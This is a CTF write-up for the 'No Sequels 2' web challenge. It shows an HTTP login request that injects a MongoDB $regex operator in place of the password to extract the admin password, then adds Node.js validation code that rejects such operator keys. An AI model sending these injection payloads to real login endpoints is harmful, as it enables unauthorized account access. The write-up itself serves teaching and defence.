Tags: nosql-injection web 

Rating: 0

# ▼▼▼ No Sequels 2 (Web: 80pts, 161/1374 = 11.7%) ▼▼▼

This is the sequel to No Sequels. You'll see the challenge page once you solve the first one.

Author: SirIan

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)


## 【exploit】

I used `$regex` to identify one character at a time from the beginning, and I judged it to be the end once `$` matched.

```http
POST /login HTTP/1.1
Host: nosequels.2019.chall.actf.co
Content-Length: 78
Content-Type: application/json
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRoZW50aWNhdGVkIjpmYWxzZSwiaWF0IjoxNTU1ODA0Nzc5fQ.N1GQCY5ZtBNZD-O9CK7nImn_jQjCqGdbE-46U4nDLQE
Connection: close

{
"username": "admin",
"password": {"$regex": "^congratsyouwin$"}
}
```

Send the password to get the flag.
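The request above works because the server passes the JSON `password` value into the database query unchanged, so an object like `{"$regex": ...}` is interpreted as a query operator instead of a string. The following is an added example (not code from the writeup or the challenge) of the check a login handler needs to reject it; it assumes a Node.js back end with a MongoDB-style query, which the writeup does not state.

```javascript
// Added example: reject operator injection in a JSON login body.
// Assumption (not stated in the writeup): Node.js handler building a
// MongoDB-style query object from req.body.

// Recursively look for any MongoDB operator key ("$regex", "$ne", "$gt", ...)
// anywhere in a parsed JSON value. Returns the path of the first hit, or null.
function findOperatorKey(value, path = "") {
  if (Array.isArray(value)) {
    for (let i = 0; i < value.length; i++) {
      const hit = findOperatorKey(value[i], `${path}[${i}]`);
      if (hit) return hit;
    }
    return null;
  }
  if (value && typeof value === "object") {
    for (const key of Object.keys(value)) {
      const here = path ? `${path}.${key}` : key;
      if (key.startsWith("$")) return here;
      const hit = findOperatorKey(value[key], here);
      if (hit) return hit;
    }
  }
  return null;
}

// Validate a login body: no operator keys anywhere, and both credentials must
// be plain strings. Returns { ok, reason } or { ok, query }.
function validateLogin(body) {
  if (!body || typeof body !== "object") return { ok: false, reason: "body is not an object" };
  const op = findOperatorKey(body);
  if (op) return { ok: false, reason: `operator key at ${op}` };
  const { username, password } = body;
  if (typeof username !== "string" || typeof password !== "string") {
    return { ok: false, reason: "credentials must be strings" };
  }
  // Values are forced to strings, so the query can only test equality and can
  // never carry an operator. (A real app would look up by username and verify
  // a password hash; the plain query shape mirrors the challenge's login.)
  return { ok: true, query: { username: String(username), password: String(password) } };
}

// Constructed sample bodies: the writeup's payload and a normal login.
const injected = { username: "admin", password: { $regex: "^congratsyouwin$" } };
const normal = { username: "admin", password: "hunter2" };

console.log(validateLogin(injected)); // { ok: false, reason: 'operator key at password.$regex' }
console.log(validateLogin(normal));   // { ok: true, query: { username: 'admin', password: 'hunter2' } }
```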